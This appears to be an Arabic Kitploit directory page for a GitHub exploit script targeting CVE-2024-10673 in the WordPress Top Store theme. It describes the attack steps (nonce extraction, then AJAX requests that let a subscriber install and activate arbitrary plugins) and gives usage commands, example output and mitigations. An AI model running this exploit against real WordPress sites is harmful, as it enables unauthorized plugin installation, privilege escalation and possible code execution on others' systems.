Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10673 — Top Store <= 1.5.4 - تثبيت/تفعيل إضافات تعسفي لمستخدم مُصادَق عليه (مشترك+) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-10673
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubnxploited/cve-2024-10673

CVE-2024-10673

Top Store <= 1.5.4 - تثبيت/تفعيل إضافات تعسفي لمستخدم مُصادَق عليه (مشترك+)

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 نظرة عامة

يستغل هذا السكريبت CVE-2024-10673، وهي ثغرة أمنية حرجة موجودة في قالب ووردبريس Top Store (<= 1.5.4). تسمح هذه الثغرة للمستخدمين الموثّقين بصلاحية مستوى المشترك أو أعلى بتثبيت وتفعيل إضافات عشوائية عبر طلبات AJAX غير محمية.

⚠️ الخطورة والأثر

  • تثبيت الإضافات غير المصرح به: يمكن للمهاجمين الحاصلين على صلاحيات المشترك تثبيت الإضافات دون موافقة المدير.
  • إمكانية تنفيذ التعليمات البرمجية عن بُعد (RCE): إذا تم تثبيت إضافة خبيثة، فقد يتمكن المهاجمون من تنفيذ تعليمات برمجية عشوائية.
  • تصعيد الصلاحيات: يمكن للمهاجمين تثبيت إضافات تمنحهم وصولاً إدارياً.

🛠️ ميزات هذا الاستغلال

  • يؤتمت الهجوم عن طريق استخراج nonce المطلوب ديناميكياً.
  • يتيح اختيار الإضافة (يمكن للمستخدمين تحديد الإضافة التي يريدون تثبيتها وتفعيلها).
  • يدعم الاستجابات بتنسيق JSON لتسجيل منظم.
  • يتعامل مع الأخطاء بسلاسة، مما يضمن تنفيذاً قوياً.

⚡ كيف يعمل الاستغلال

  1. سجّل الدخول إلى ووردبريس باستخدام بيانات اعتماد صالحة.
  2. استخرج nonce الخاص بـ AJAX من themes.php?page=thunk_started.
  3. أرسل طلب AJAX لتثبيت إضافة (الافتراضي: hunk-companion أو إضافة يحددها المستخدم).
  4. أرسل طلباً آخر لتفعيل الإضافة.
  5. أخرج استجابات JSON تشير إلى النجاح أو الفشل.

🚀 الاستخدام

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

أمثلة

  • تثبيت وتفعيل الإضافة الافتراضية (hunk-companion):
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • تثبيت وتفعيل إضافة محددة (woocommerce):
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 المخرجات المتوقعة

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 التخفيف

لتأمين موقع ووردبريس الخاص بك:

  • قم بالتحديث إلى إصدار مصحح من قالب Top Store.
  • قيّد صلاحيات المشتركين لمنع الوصول غير الضروري.
  • راقب الإضافات المثبتة بحثاً عن تغييرات غير مصرح بها.
  • عطّل تثبيت الإضافات لغير المسؤولين.

⚠️ إخلاء مسؤولية

هذا السكريبت مخصص للأغراض التعليمية والبحث الأمني فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني. استخدمه بمسؤولية!

بقلم: Khaled Alenazi (Nxploit)

تنزيل الأداة